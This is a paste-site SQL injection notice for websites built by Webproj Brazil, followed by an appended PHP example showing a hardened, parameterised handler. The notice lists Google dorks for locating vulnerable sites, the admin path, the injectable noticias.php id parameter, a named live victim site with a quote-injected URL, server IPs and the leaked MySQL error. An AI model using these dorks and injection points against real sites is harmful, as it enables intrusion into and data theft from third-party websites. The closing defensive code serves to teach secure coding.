KingSkrupellos

Desenvolvido por Webproj Brazil SQL Injection

Jan 16th, 2019
######################################################

# Exploit Title : Webproj Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/01/2019
# Vendor Homepage : webproj.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Webproj'' site:br
intext:''Criação de sites Porto Alegre''
intext:''Criação de loja virtual Porto Alegre''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

######################################################

# Admin Panel Login Path :
*************************
/admin

# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]

######################################################

# Example Vulnerable Site :
*************************

[+] corpoacao.com.br/noticias.php?id=61%27 =>

[ Proof of Concept ] => archive.is/Ym4qv

Note : (191.252.132.249) => There are 18 domains hosted on this server.

Note : (35.211.91.136) => There are 6 domains hosted on this server.

######################################################

# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near ''61''' at line 1

######################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################
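
The error text near ''61''' shows the id value sitting inside a quoted string in the query, and the raw MySQL error being returned to the visitor. A hardened form of such a handler, as an added example (not the vendor's code and not part of the original paste): the table and column names and both function names are hypothetical, and in-memory SQLite via PDO stands in for MySQL so the script runs offline.

```php
<?php
// Added example: hardened lookup for a hypothetical noticias.php handler.
// Assumptions: table "noticias" with columns id/titulo; SQLite replaces MySQL.
declare(strict_types=1);

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    // Raise exceptions so errors are handled in code, not printed by the driver.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE noticias (id INTEGER PRIMARY KEY, titulo TEXT)');
    $pdo->exec("INSERT INTO noticias (id, titulo) VALUES (61, 'Constructed sample row')");
    return $pdo;
}

/** Returns the matching row, or null when the id is malformed or unknown. */
function find_noticia(PDO $pdo, $rawId): ?array
{
    // 1. Allow-list the input: a positive integer only. "61'" is rejected here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind the value as a parameter: it never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT id, titulo FROM noticias WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    try {
        $stmt->execute();
    } catch (PDOException $e) {
        // 3. Log server-side; never echo the database error to the client.
        error_log('noticias lookup failed: ' . $e->getMessage());
        return null;
    }
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a valid id, the quoted value from the paste, junk, unknown id.
$pdo = open_demo_db();
foreach (['61', "61'", 'abc', '999'] as $input) {
    $row = find_noticia($pdo, $input);
    printf("%-8s => %s\n", var_export($input, true), $row ? $row['titulo'] : '404 Not Found');
}
```

Only the first input returns a row; the other three fall through to the same generic not-found response, with no SQL error text exposed.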